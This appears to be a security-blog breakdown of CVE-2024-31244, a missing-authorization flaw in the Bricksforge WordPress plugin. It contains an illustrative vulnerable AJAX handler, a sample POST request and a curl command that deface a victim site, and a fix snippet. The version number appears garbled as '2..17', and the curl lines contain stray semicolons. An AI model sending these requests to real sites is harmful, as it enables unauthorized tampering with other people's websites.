CVE-2024-31244 - Missing Authorization in Bricksforge up to 2..17 – Full Exploit Breakdown

In May 2024, a critical security hole, CVE-2024-31244, was discovered in the popular WordPress plugin, Bricksforge, up to and including version 2..17. This flaw allows attackers to perform unauthorized actions due to missing authorization checks. Below, we walk you through exactly what’s affected, the potential impact, and practical exploit examples.

What is Bricksforge?

Bricksforge is a toolkit that extends the Bricks Builder for WordPress, allowing users to enhance website functionality without writing much code. Due to its ease-of-use, it’s popular among both developers and non-technical site owners.

What’s the Bug? (CVE-2024-31244)

A *missing authorization* vulnerability means that the plugin does not properly check if a user has permission to access or modify certain features. If a user is not properly vetted, anyone who can access the right function or endpoint can misuse it.

> Vulnerable: Bricksforge from earliest releases until 2..17

Patched: No patch as of June 2024. (Refer to official changelog for any updates.)

Vulnerable Code Deep-Dive

Here is a simplified code snippet that shows the type of issue present in Bricksforge. This is not the actual source, but an illustration based on advisory details:

function bricksforge_custom_save() {
  // MISSING: No verification of user permissions here
  if(isset($_POST['payload'])) {
    $data = $_POST['payload'];
    // Action: save settings, change site elements, etc.
    update_option('bricksforge_settings', $data);
    echo 'Saved!';
  }
}
add_action('wp_ajax_bricksforge_custom_save', 'bricksforge_custom_save');

What’s wrong?
Anyone who is logged in (or in some cases, anyone at all) can POST to the bricksforge_custom_save AJAX endpoint and change critical settings, since there’s no check like current_user_can('manage_options') or a security nonce.

Exploiting CVE-2024-31244: Example Attack

An attacker can easily exploit this flaw if they know or guess the vulnerable AJAX action name.

Send a crafted POST request:

POST /wp-admin/admin-ajax.php?action=bricksforge_custom_save
Content-Type: application/x-www-form-urlencoded

payload={"site_name": "Hacked by attacker", "theme_color": "red"}

> Any critical settings can be changed depending on what the payload can touch.

Using curl

curl -X POST "https://victim-site.com/wp-admin/admin-ajax.php?action=bricksforge_custom_save"; \
  -d 'payload={"site_name":"Hacked!","logo_url":"https://attacker.site/logo.png"}'; \
  -b "wordpress_logged_in_cookie_here"

Impact:

Attackers can pivot to gain higher privileges (for example, by enabling custom code blocks).

- Threats include defacement, *malware installation*, and further attacks on site visitors.

How to Fix

Temporary Mitigation:

Restrict site user registrations.

- Use a firewall plugin to restrict access to /wp-admin/admin-ajax.php only to trusted users.

Permanent Solution:

Update Bricksforge immediately once a fixed version is available.

- Monitor the changelog and WordPress plugins page for releases.

Audit other plugins for missing authorization checks.

Developer Best Practice:

Always use authorization checks in custom AJAX and form handlers

if (!current_user_can('manage_options')) {
  wp_die('Not allowed');
}

References & Further Reading

- Original CVE Entry
- Bricksforge Official Site
- WPScan Vulnerability Entry
- WordPress Plugin Security Practices – Official Docs
- OWASP Missing Function Level Access Control

Conclusion

CVE-2024-31244 underlines how critical authorization checks are in WordPress plugin development. If you’re running Bricksforge up to 2..17, patch or disable it urgently to protect your site. Stay tuned to trusted sources and always keep plugins up to date.

Timeline

Published on: 06/09/2024 12:15:09 UTC
Last modified on: 06/10/2024 02:52:08 UTC